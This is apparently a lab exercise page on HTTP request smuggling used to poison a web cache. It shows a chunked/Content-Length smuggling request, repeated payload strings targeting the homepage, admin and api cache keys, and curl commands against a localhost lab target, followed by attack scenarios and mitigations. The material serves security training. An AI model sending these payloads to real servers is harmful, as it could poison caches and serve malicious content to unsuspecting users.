Lab 4: Cache Poisoning via Smuggling - HTTP Request Smuggling

Difficulty: High

Lab Overview

This lab demonstrates how HTTP Request Smuggling can be used to poison caches and serve malicious content to users. By smuggling requests that target cache keys, attackers can poison the cache and serve malicious content to legitimate users.

Objective: Use request smuggling to poison the cache and serve malicious content to users.

Cache Poisoning Attack

// Cache Poisoning via Request Smuggling

// Step 1: Smuggle a request that poisons the cache
POST /4.php HTTP/1.1
Host: example.com
Content-Length: 13
Transfer-Encoding: chunked

0

GET /4.php?cache_key=homepage HTTP/1.1
Host: example.com
X-Cache-Key: homepage
Content-Length: 0

// Step 2: The smuggled request poisons the cache
// Step 3: Legitimate users get the poisoned content

// Example poisoned cache entry:
// Key: homepage
// Value: POISONED:

Cache Poisoning Tester

Test Payloads:

0\r\n\r\nGET /4.php?cache_key=homepage HTTP/1.1\r\nHost: example.com\r\nX-Cache-Key: homepage\r\nContent-Length: 0\r\n\r\n
0\r\n\r\nGET /4.php?cache_key=admin HTTP/1.1\r\nHost: example.com\r\nX-Cache-Key: admin\r\nContent-Length: 0\r\n\r\n
0\r\n\r\nGET /4.php?cache_key=api HTTP/1.1\r\nHost: example.com\r\nX-Cache-Key: api\r\nContent-Length: 0\r\n\r\n

Vulnerability Details

Type: HTTP Request Smuggling (Cache Poisoning)
Severity: Critical
Method: POST/GET
Issue: Cache poisoning via request smuggling

Test Payloads

Try these payloads in the request body:

0\r\n\r\nGET /4.php?cache_key=homepage HTTP/1.1\r\nHost: example.com\r\nX-Cache-Key: homepage\r\nContent-Length: 0\r\n\r\n
0\r\n\r\nGET /4.php?cache_key=admin HTTP/1.1\r\nHost: example.com\r\nX-Cache-Key: admin\r\nContent-Length: 0\r\n\r\n
0\r\n\r\nGET /4.php?cache_key=api HTTP/1.1\r\nHost: example.com\r\nX-Cache-Key: api\r\nContent-Length: 0\r\n\r\n

Manual Testing with curl

Use these curl commands to test the vulnerability:

# Step 1: Poison the cache
curl -X POST http://localhost/test/http_rs/4.php \
  -H "Content-Length: 13" \
  -H "Transfer-Encoding: chunked" \
  -d "0

GET /4.php?cache_key=homepage HTTP/1.1
Host: example.com
X-Cache-Key: homepage
Content-Length: 0

"

# Step 2: Check if cache was poisoned
curl "http://localhost/test/http_rs/4.php?cache_key=homepage"

Real-World Attack Scenarios

Cache poisoning and serving malicious content to users
XSS attacks via poisoned cache entries
Phishing attacks by poisoning legitimate pages
Session hijacking and user impersonation
Bypass authentication and authorization mechanisms
Compliance violations and security breaches

Mitigation Strategies

Ensure consistent parsing between frontend and backend servers
Implement proper cache validation and sanitization
Use cache keys that are not controllable by users
Implement request validation and sanitization
Use reverse proxies that handle parsing consistently
Regular security testing and vulnerability assessments
Monitor for unusual request patterns and cache anomalies